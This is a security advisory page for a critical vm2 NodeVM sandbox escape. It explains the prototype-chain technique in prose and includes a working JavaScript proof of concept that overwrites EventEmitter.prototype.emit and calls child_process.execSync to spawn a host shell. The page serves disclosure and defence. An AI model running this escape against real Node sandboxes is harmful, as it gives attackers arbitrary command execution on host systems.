criticalCVSS 10Vulnerability

CVE-2026-92955

## Summary It being possible to obtain the host `__proto__` getter/setter, has been used in many reports: - https://github.com/patriksimek/vm2/security/advisories/GHSA-vwrp-x96c-mhwq - https://github.com/patriksimek/vm2/security/advisories/GHSA-v6mx-mf47-r5wg - https://github.com/patriksimek/vm2/security/advisories/GHSA-grj5-jjm8-h35p - https://github.com/patriksimek/vm2/security/advisories/GHSA-47x8-96vw-5wg6 Yet it was never patched... --- This can, still, be used to escape the sandbox, one example (I'm sure there's other ways as well), is via `console._stdout`/`console._stderr` (`NodeVM` with `console: 'inherit'`, which is the default) ## Details The prototype chain for `console._stdout`/`console._stderr` is: ``` _stdout / _stderr -> WriteStream (TTY only) -> Socket -> Duplex -> Readable -> Stream -> EventEmitter ``` `process` is an `EventEmitter`, and nothing stops us from writing things to `EventEmmiter.prototype` By overwriting `EventEmmiter.prototype.emit` with a function, and making `process` emit an event (e.g. `exit`, `unhandledRejection` etc.), we can execute code with `this` being `process`. This also bypasses `--disallow-code-generation-from-strings`, which blocks the "usual" escape of obtaining the host function constructor. ## PoC ```js const { NodeVM } = require("vm2"); code = ` const gP = Buffer.call.call(__lookupGetter__,67,'__proto__'); // vm __proto__ getter console.log(__lookupGetter__.call(0,'__proto__').call(console._stderr)); // [Object: null prototype] {} // host __proto__ getter console.log(gP.call(console._stderr)); // Socket { [...] } let p = console._stdout; while (p.pipe) { console.log(p.constructor.name); p = gP.call(p); }; p.emit = function(){ console.log(this+[]); this.getBuiltinModule("child_process").execSync("sh",{stdio:"inherit"}) } `; const vm = new NodeVM(); vm.run(code); ```

Properties

severity
critical
summary
vm2: Sandbox Escape (NodeVM)
epss_score
0.00712
cvss_score
10
retrieved_at
2026-10-05T22:59:58+00:00
ghsa_published
2026-10-05T22:47:09Z
source_url
https://github.com/advisories/GHSA-88hf-g992-jg85
ghsa_updated
2026-10-05T22:47:10Z
ghsa_id
GHSA-88hf-g992-jg85
last_source
FIRST EPSS
cve_id
CVE-2026-92955
cvss_vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
signal_observed_at
2026-10-05T22:52:21+00:00
is_ghsa_only
false
epss_percentile
0.51998

Related Entities (5)

ENRICHED_BY (1)

→[Source]FIRST EPSS

VULNERABLE_TO (1)

←[Software]npm/vm2

AFFECTS (1)

→[Software]npm/vm2

HAS_WEAKNESS (1)

→[Weakness]Improper Control of Dynamically-Managed Code Resources

REPORTED_BY (1)

→[Source]GitHub Advisory Database

Explore deeper with Ninja Signal's threat intelligence graph

CVE-2026-92955 (CVSS 10) — Ninja Signal Threat Intelligence | Ninja Signal